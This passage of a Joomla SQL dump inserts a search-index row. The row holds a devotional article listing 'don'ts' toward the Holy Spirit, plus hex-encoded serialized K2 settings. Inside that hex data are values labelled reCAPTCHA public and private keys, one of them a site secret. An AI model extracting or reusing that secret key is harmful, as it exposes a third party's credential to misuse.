4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031382d30382d32342031353a31373a3033223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031382d30382d32342031353a31373a3033223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(305, 'index.php?option=com_k2&view=item&id=60', 'index.php?option=com_k2&view=item&id=60:from-our-father-s-heart-02-08-2018', 'From our Father\'s Heart (19/08/2018)', ' Dearly Beloved, I want to show you today some DON’TS OF THE HOLY SPIRIT you must avoid as you ENTER INTO THE WORLD OF THE HOLY SPIRIT. Taking note of these will keep you safe as you grow in your relationship with the Holy Spirit. 1. Don\'t ignore Him. One of the ways by which the Holy Spirit contacts us is through CONSTRAINT and RESTRAINT. Ignoring this communication of the Holy Spirit is preparing for a future of pain. Constraint means to make somebody do something by force or by strong persuasion, that is, something that limits one’s freedom of action. Constraint is a strong inner pressure to go ahead. Some versions of the Bible render constraint as compel. Therefore, it is possible for your spirit-man to compel you to do something. RESTRAINT is an equally strong inner pressure not to go ahead. Do not ignore Him whenever He brings the signals to you. You are only refreshed when you do what the spirit constrains you to do. ', '2018-08-24 15:18:53', '8cfeb6135b2dbbd2a6f7184816e7e6b5', 1, 1, 1, '*', '2018-08-24 15:08:29', '0000-00-00 00:00:00', '2018-08-24 15:08:29', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223630223b733a353a22616c696173223b733a33343a2266726f6d2d6f75722d6661746865722d732d68656172742d30322d30382d32303138223b733a373a2273756d6d617279223b733a313037393a223c703e3c7374726f6e673e3c7370616e206c616e673d22454e2d4742223e446561726c792042656c6f7665642c3c2f7370616e3e3c2f7374726f6e673e3c2f703e0d0a3c703e3c7370616e206c616e673d22454e2d4742223e492077616e7420746f2073686f7720796f7520746f64617920736f6d6520444f4ee280995453204f462054484520484f4c592053504952495420796f75206d7573742061766f696420617320796f7520454e54455220494e544f2054484520574f524c44204f462054484520484f4c59205350495249542e2054616b696e67206e6f7465206f662074686573652077696c6c206b65657020796f75207361666520617320796f752067726f7720696e20796f75722072656c6174696f6e7368697020776974682074686520486f6c79205370697269742e3c2f7370616e3ec2a03c2f703e0d0a3c703e312e20446f6e27742069676e6f72652048696d2e204f6e65206f662074686520776179732062792077686963682074686520486f6c792053706972697420636f6e7461637473207573206973207468726f75676820434f4e53545241494e5420616e6420524553545241494e542e2049676e6f72696e67207468697320636f6d6d756e69636174696f6e206f662074686520486f6c792053706972697420697320707265706172696e6720666f72206120667574757265206f66207061696e2e20436f6e73747261696e74206d65616e7320746f206d616b6520736f6d65626f647920646f20736f6d657468696e6720627920666f726365206f72206279207374726f6e672070657273756173696f6e2c20746861742069732c20736f6d657468696e672074686174206c696d697473206f6e65e28099732066726565646f6d206f6620616374696f6e2e20436f6e73747261696e742069732061207374726f6e6720696e6e657220707265737375726520746f20676f2061686561642e20536f6d652076657273696f6e73206f6620746865204269626c652072656e64657220636f6e73747261696e7420617320636f6d70656c2e205468657265666f72652c20697420697320706f737369626c6520666f7220796f7572207370697269742d6d616e20746f20636f6d70656c20796f7520746f20646f20736f6d657468696e672e20524553545241494e5420697320616e20657175616c6c79207374726f6e6720696e6e6572207072657373757265206e6f7420746f20676f2061686561642e20446f206e6f742069676e6f72652048696d207768656e65766572204865206272696e677320746865207369676e616c7320746f20796f752e20596f7520617265206f6e6c7920726566726573686564207768656e20796f7520646f2077686174207468652073706972697420636f6e73747261696e7320796f7520746f20646f2e3c7370616e207374796c653d22666f6e742d73697a653a2031322e313670783b223ec2a03c2f7370616e3e3c2f703e0d0a223b733a343a22626f6479223b733a333232333a220d0a3c703e322e20446f6e2774206772696576652048696d2e20457068657369616e7320343a3330207361797320e2809c20416e6420677269657665206e6f742074686520486f6c7920537069726974206f6620476f642c207768657265627920796520617265207365616c656420756e746f2074686520646179206f6620726564656d7074696f6e2ee2809d2041766f6964206c696b65206120706c6167756520616374697669746965732074686174206d616b652061206d616e20746f206772696576652074686520486f6c79205370697269742e2057726174682c20616e6765722c206469736f62656469656e636520746f206120646976696e6520696e737472756374696f6e2c206269747465726e6573732c206576696c2d737065616b696e672c206d616c6963652c20656e76792c20746f206d656e74696f6e2061206665772061726520736f6d65206f662074686520616374697669746965732074686174206772696576652074686520486f6c79205370697269742ec2a03c2f703e0d0a3c703e332e20446f6e27742074616b652048696d20666f72206772616e7465642e204e6f206d616e2063616e207374616e642074686520636f6e73657175656e6365206f662074616b696e672074686520486f6c792053706972697420666f72206772616e7465642c20736f20646f6ee280997420646f2069742ec2a03c2f703e0d0a3c703e342e20446f206e6f742062656c6974746c652048696d2062792063616c6c696e672048696d20736f6d657468696e67206f7220616e20696e666c75656e63652e2054686520486f6c7920537069726974206973206e6f742061207468696e67206f7220616e20696e666c75656e63652c204865206973206120706572736f6e2e2043616c6c696e672048696d20736f6d657468696e67206f7220616e20696e666c75656e63652069732062656c6974746c696e672048697320706572736f6e616c6974792e2053746f7020736179696e6720736f6d657468696e672074656c6c73206d6520746f20646f206974206173206120626f726e2d616761696e2c2072656372656174656420616e642072656e6577656420706572736f6e2e2053746f70207472697669616c697a696e6720646976696e6520636f6d6d756e69636174696f6e732066726f6d20796f7572207370697269742d6d616e2ec2a03c2f703e0d0a3c703e352e20446f206e6f74206469736f6265792048696d2e20312053616d2e2031353a31302d32332e20446f206e6f74206469736f6265792074686520696e737472756374696f6e73206f662074686520486f6c79205370697269742e205361756c20746865204b696e67206f662049737261656c20646964206e6f74207265636f7665722066726f6d2069742e204d616b6520697420796f7572206461696c7920707261637469636520746f206f6265792048696d2e2049206d6164652061206465636973696f6e206d616e792079656172732061676f207468617420492057494c4c204e4f542057494c4c46554c4c59204f52204b4e4f57494e474c59204449534f4245592054484520484f4c592053504952495420616e6420492068617665206b65707420746f20746861742074696c6c20646174652e20596f752063616e20616c736f20646f207468652073616d652e20546865736520617265206465636973696f6e732074686174206b65657020796f75722072656c6174696f6e73686970207361666520776974682074686520486f6c79205370697269742ec2a03c2f703e0d0a3c703e362e20446f6e27742074726561742048696d206c696b6520612073706172652d747972652e20446f6ee2809974206861766520612073756761722d6461646479206b696e64206f662072656c6174696f6e7368697020776974682074686520486f6c79205370697269742e2054686572652061726520696e646976696475616c7320746861742077616e7420746f20636f6d6520746f20476f64206f6e6c79207768656e207468657920686176652070726f626c656d7320616e64206f6e6365207468652070726f626c656d20697320736f6c7665642c20746865792072657475726e206261636b20746f20746865697220666f726d657220776179206f66206c6966652e20446f6ee280997420616c736f20636f6d6520746f2048696d20616674657220796f75206861766520747269656420616c6c20746865206f74686572207468696e677320616e64206974206469646ee280997420776f726b206f75742e204c65742074686520486f6c792053706972697420626520796f757220666972737420706f696e74206f662063616c6c20696e20657665727920736974756174696f6e206f66206c6966652ec2a03c2f703e0d0a3c703e372e20446f206e6f74207472697669616c697a6520486973206f7065726174696f6e7320696e20796f75206f72207468726f75676820796f752e20486f6c7920537069726974206f7065726174696f6e7320696e20796f752077696c6c206265206120435553544f4d495a4544204f5045524154494f4e2e20596f75206d75737420646576656c6f7020636f6e666964656e636520696e2048696d2e204f6e636520796f7520627265616b20696e746f20746865207265616c6d73206f662074686520486f6c792047686f73742c20746865207265616c6d73206f662074686520657863656564696e67206162756e64616e746c792061626f7665206265636f6d657320796f7572206e6f726d616c206c6966652e204865206b6e6f777320776865726520616c6c20746865207265736f757263657320796f75206e65656420696e207468697320776f726c64206172652ec2a03c2f703e0d0a3c703e382e20446f6e27742074616b652074686520706c616365206f66204a6573757320696e20616e797468696e672e20596f75206d75737420616c7761797320616c6c6f77204a6573757320746f206c65616420696e207468652061666661697273206f6620796f7572206c6966652e204c65742048696d204245204c4f52442e3c2f703e0d0a3c703e392e20446f206e6f742073747269766520776974682048696d2e2047656e2e20363a33207361797320e2809c416e6420746865204c4f524420736169642c204d7920737069726974207368616c6c206e6f7420616c77617973207374726976652077697468206d616ee280a6e280a62ee2809d20492077726f7465206120626f6f6b204c4f534520544f2057494e206f722057494e20544f204c4f53452e205768656e2061206d616e20636f6e74696e75616c6c79207374726976657320776974682074686520486f6c79205370697269742c20612074696d652077696c6c20636f6d652074686520486f6c79205370697269742077696c6c204c4f534520544f2048494d2e205768656e20746861742068617070656e732c20646973617374657220697320696d6d696e656e742e204e6576657220616c6c6f772074686520486f6c792053706972697420746f204c4f534520544f20594f552e20596f752073686f756c64206c6f736520746f2074686520486f6c792053706972697420616e64206576656e7475616c6c7920796f752077696c6c2077696e2061742074686520656e642ec2a03c2f703e0d0a3c703e31302e20446f206e6f742061747461636b2073706972697475616c20617574686f7269746965732e20446176696420736169642077686f2077696c6c20746f75636820746865204c6f7264277320616e6f696e74656420616e64206265206775696c746c6573732e205768656e20736f6d656f6e65206973206f7065726174696e6720756e6465722074686520616e6f696e74696e67206265206361726566756c2e20496620796f752077616e742074686520486f6c792047686f737420746f206d6f766520696e20796f7572206c6966652c206265206361726566756c207768617420796f752061747461636b2e2049662061206c6561646572206661696c7320616e6420796f757220636f6e736369656e63652063616e27742077616c6b20776974682068696d20616e79206c6f6e6765722c20796f752068617665206120726967687420746f2077616c6b20617761792e20446f206e6f74206a6f696e2070656f706c6520746f2061747461636b2073706972697475616c20617574686f7269746965732e3c2f703e0d0a3c703e4974207368616c6c2062652077656c6c207769746820796f7520696e204a65737573206e616d652ec2a03c2f703e0d0a3c703e54696c6c206e657874207765656b2c20676f20616e642077696e2077697468204a657375732e3c2f703e0d0a3c703e476f64e28099732053657276616e742c3c2f703e0d0a3c703e5265762e204f6c75736f6c61204172656f67756e2e3c2f703e0d0a3c703ec2a03c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031382d30382d32342031353a31383a3533223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223239223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a33373a2236303a66726f6d2d6f75722d6661746865722d732d68656172742d30322d30382d32303138223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a393a224c6966656f61736973223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a35353a22636f6d706f6e656e742f6b322f6974656d2f36302d66726f6d2d6f75722d6661746865722d732d68656172742d30322d30382d32303138223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313